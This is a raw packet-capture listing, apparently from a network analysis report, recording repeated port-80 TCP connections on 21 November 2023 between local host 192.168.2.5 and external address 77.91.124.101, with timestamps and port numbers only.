                                                            Nov 21, 2023 04:48:11.312056065 CET4978180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.370440006 CET4978180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.370635986 CET4978280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.492883921 CET4978380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.508858919 CET804978177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:11.508879900 CET804978177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:11.513534069 CET804978177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:11.513675928 CET4978180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.567082882 CET804978177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:11.567174911 CET4978180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.570805073 CET804978277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:11.570939064 CET4978280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.571331024 CET4978280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.689256907 CET804978377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:11.689356089 CET4978380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.689568043 CET4978380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.768919945 CET804978277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:11.769016981 CET804978277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:11.769237995 CET4978280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.885772943 CET804978377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:11.885853052 CET804978377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:11.886046886 CET4978380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:11.967093945 CET804978277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:11.971777916 CET804978277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:12.025677919 CET4978280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:12.082340956 CET804978377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:12.082355022 CET804978377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:12.086941957 CET804978377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:12.134993076 CET4978380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:12.211539984 CET4978280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:12.212126017 CET4978380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:12.212127924 CET4978480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:12.408413887 CET804978377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:12.408477068 CET4978380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:12.409257889 CET804978277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:12.409307003 CET4978280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:12.409594059 CET804978477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:12.409667015 CET4978480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:12.409848928 CET4978480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:12.607335091 CET804978477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:12.607481956 CET804978477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:12.607781887 CET4978480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:12.805670977 CET804978477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:12.805685043 CET804978477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:12.810369015 CET804978477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:12.853688955 CET4978480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:12.931277037 CET4978580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:13.127722979 CET804978577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:13.127845049 CET4978580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:13.128065109 CET4978580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:13.326037884 CET804978577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:13.326134920 CET804978577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:13.326483011 CET4978580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:13.523746967 CET804978577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:13.523760080 CET804978577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:13.528403044 CET804978577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:13.572493076 CET4978580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:13.649985075 CET4978580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:13.650235891 CET4978480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:13.651012897 CET4978680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:13.846317053 CET804978577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:13.846375942 CET4978580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:13.848625898 CET804978677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:13.848706961 CET4978680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:13.848887920 CET4978680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:14.051949024 CET804978677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:14.051969051 CET804978677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:14.052304029 CET4978680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:14.249972105 CET804978677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:14.249990940 CET804978677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:14.254933119 CET804978677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:14.306840897 CET4978680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:14.387388945 CET4978680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:14.387969971 CET4978880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:14.584949017 CET804978677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:14.585045099 CET4978680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:14.586519957 CET804978877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:14.586591959 CET4978880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:14.724189043 CET4978880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:14.922672987 CET804978877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:14.922880888 CET804978877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:14.923093081 CET4978880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:15.121596098 CET804978877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:15.121720076 CET804978877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:15.129034042 CET804978877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:15.181835890 CET4978880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:16.584247112 CET4978880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:16.584671974 CET4978980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:16.782497883 CET804978977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:16.782649040 CET4978980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:16.782906055 CET804978877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:16.782963037 CET4978880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:16.791912079 CET4978980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:16.979804039 CET4978980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:16.980269909 CET4979080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:16.989535093 CET804978977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:16.989553928 CET804978977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:16.989646912 CET4978980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:17.103358984 CET4979180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:17.179625034 CET804979077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:17.179722071 CET4979080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:17.179908991 CET4979080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:17.181687117 CET804978977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:17.181700945 CET804978977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:17.181746006 CET4978980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:17.181746006 CET4978980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:17.299793005 CET804979177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:17.299877882 CET4979180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:17.300045013 CET4979180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:17.377413034 CET804979077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:17.377446890 CET804979077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:17.377918959 CET4979080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:17.496263981 CET804979177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:17.496331930 CET804979177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:17.531966925 CET4979180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:17.575539112 CET804979077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:17.580379963 CET804979077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:17.635025024 CET4979080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:17.728526115 CET804979177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:17.728538990 CET804979177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:17.733270884 CET804979177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:17.775616884 CET4979180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:17.851317883 CET4979080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:17.851325035 CET4979180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:17.851876974 CET4979280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:18.047656059 CET804979177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:18.047713041 CET4979180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:18.048911095 CET804979077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:18.048973083 CET4979080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:18.050043106 CET804979277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:18.050127029 CET4979280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:18.050329924 CET4979280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:18.250891924 CET804979277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:18.251388073 CET804979277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:18.251651049 CET4979280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:18.455463886 CET804979277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:18.455480099 CET804979277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:18.462958097 CET804979277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:18.510097980 CET4979280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:18.593664885 CET4979380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:18.789995909 CET804979377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:18.790117025 CET4979380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:18.790292025 CET4979380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:18.986565113 CET804979377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:18.986663103 CET804979377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:18.986892939 CET4979380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:19.183403969 CET804979377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:19.183419943 CET804979377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:19.188397884 CET804979377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:19.228729010 CET4979380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:19.303898096 CET4979380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:19.304286003 CET4979480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:19.500169039 CET804979377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:19.500231028 CET4979380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:19.503551960 CET804979477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:19.503622055 CET4979480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:19.503804922 CET4979480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:19.702572107 CET804979477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:19.702590942 CET804979477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:19.702955961 CET4979480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:19.901808977 CET804979477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:19.901824951 CET804979477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:19.906702995 CET804979477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:19.947474957 CET4979480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:20.038008928 CET4979480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:20.038428068 CET4979580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:20.236146927 CET804979577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:20.236301899 CET4979580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:20.236531973 CET4979580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:20.236767054 CET804979477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:20.236829042 CET4979480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:20.434164047 CET804979577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:20.434251070 CET804979577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:20.434470892 CET4979580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:20.632241011 CET804979577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:20.632255077 CET804979577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:20.636868000 CET804979577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:20.681838989 CET4979580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:20.757236958 CET4979580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:20.757711887 CET4979680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:20.956063032 CET804979577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:20.956312895 CET4979580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:20.956985950 CET804979677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:20.957134008 CET4979680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:20.957691908 CET4979680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:21.155545950 CET804979677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:21.155589104 CET804979677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:21.155800104 CET4979680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:21.360723019 CET804979677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:21.361145973 CET804979677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:21.366157055 CET804979677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:21.416209936 CET4979680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:21.489298105 CET4979280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:21.492114067 CET4979680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:21.492629051 CET4979780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:21.689235926 CET804979777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:21.689379930 CET4979780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:21.689570904 CET4979780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:21.689846039 CET804979677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:21.689908028 CET4979680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:21.886152029 CET804979777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:21.886193037 CET804979777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:21.886437893 CET4979780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.083067894 CET804979777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:22.083084106 CET804979777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:22.088074923 CET804979777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:22.135001898 CET4979780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.211766958 CET4979780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.212152958 CET4979880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.408544064 CET804979777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:22.408655882 CET4979780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.410846949 CET804979877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:22.410970926 CET4979880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.411200047 CET4979880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.588603020 CET4979880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.589097023 CET4979980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.609817982 CET804979877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:22.609960079 CET804979877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:22.610143900 CET4979880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.710377932 CET4980080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.786708117 CET804979977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:22.786935091 CET4979980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.787108898 CET4979980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.791090012 CET804979877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:22.791104078 CET804979877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:22.791147947 CET4979880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.791469097 CET4979880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.909410000 CET804980077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:22.909523964 CET4980080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.909718037 CET4980080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:22.984949112 CET804979977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:22.984966040 CET804979977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:22.988972902 CET4979980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.108584881 CET804980077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.108768940 CET804980077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.108985901 CET4980080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.186717987 CET804979977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.191557884 CET804979977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.244353056 CET4979980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.308058023 CET804980077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.308073997 CET804980077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.312886953 CET804980077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.353749037 CET4980080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.428406000 CET4979980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.428437948 CET4980080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.429019928 CET4980180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.625499010 CET804980177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.625679016 CET4980180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.625977993 CET804979977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.625998974 CET4980180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.626032114 CET4979980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.627301931 CET804980077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.627367020 CET4980080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:23.822444916 CET804980177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.822474003 CET804980177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:23.822760105 CET4980180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.019813061 CET804980177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.019831896 CET804980177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.026417971 CET804980177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.072474003 CET4980180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.149220943 CET4980280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.347518921 CET804980277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.347619057 CET4980280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.347886086 CET4980280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.546741962 CET804980277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.546761036 CET804980277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.546966076 CET4980280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.744587898 CET804980277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.744601965 CET804980277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.749294043 CET804980277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:24.791263103 CET4980280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.866031885 CET4980280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:24.866437912 CET4980380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.067226887 CET804980377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.067285061 CET804980277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.067464113 CET4980280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.067468882 CET4980380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.067761898 CET4980380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.277518988 CET804980377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.277538061 CET804980377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.277765989 CET4980380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.474365950 CET804980377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.474406958 CET804980377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.479048967 CET804980377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.525733948 CET4980380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.600869894 CET4980380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.601320028 CET4980480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.797530890 CET804980377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.797616959 CET4980380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.799912930 CET804980477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.800035000 CET4980480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.800508976 CET4980480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:25.999152899 CET804980477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.999167919 CET804980477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:25.999428034 CET4980480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.198118925 CET804980477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.209800005 CET804980477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.259999037 CET4980480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.340667963 CET4980480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.341114998 CET4980580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.539402962 CET804980577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.539577007 CET4980580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.539843082 CET4980580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.540630102 CET804980477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.540692091 CET4980480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.737046003 CET804980577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.737345934 CET804980577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.738204956 CET4980580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:26.934540987 CET804980577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.934734106 CET804980577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.941642046 CET804980577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:26.994523048 CET4980580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.067461014 CET4980180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.069034100 CET4980580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.069621086 CET4980680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.265774965 CET804980577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.265877008 CET4980580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.268551111 CET804980677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.268646955 CET4980680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.268814087 CET4980680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.467658043 CET804980677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.467691898 CET804980677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.467921019 CET4980680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.668662071 CET804980677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.673158884 CET804980677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.728789091 CET4980680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.791090965 CET4980680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.791416883 CET4980780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.987968922 CET804980777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.988145113 CET4980780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.988404036 CET4980780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:27.990009069 CET804980677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:27.990087032 CET4980680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.184833050 CET804980777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.185064077 CET804980777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.185298920 CET4980780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.198307991 CET4980780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.198645115 CET4980880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.320805073 CET4980980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.381860971 CET804980777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.381875992 CET804980777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.386883974 CET804980777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.386940002 CET4980780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.394717932 CET804980777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.394768000 CET4980780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.395483017 CET804980877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:28.395555019 CET4980880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:28.395704985 CET4980880192.168.2.577.91.124.101
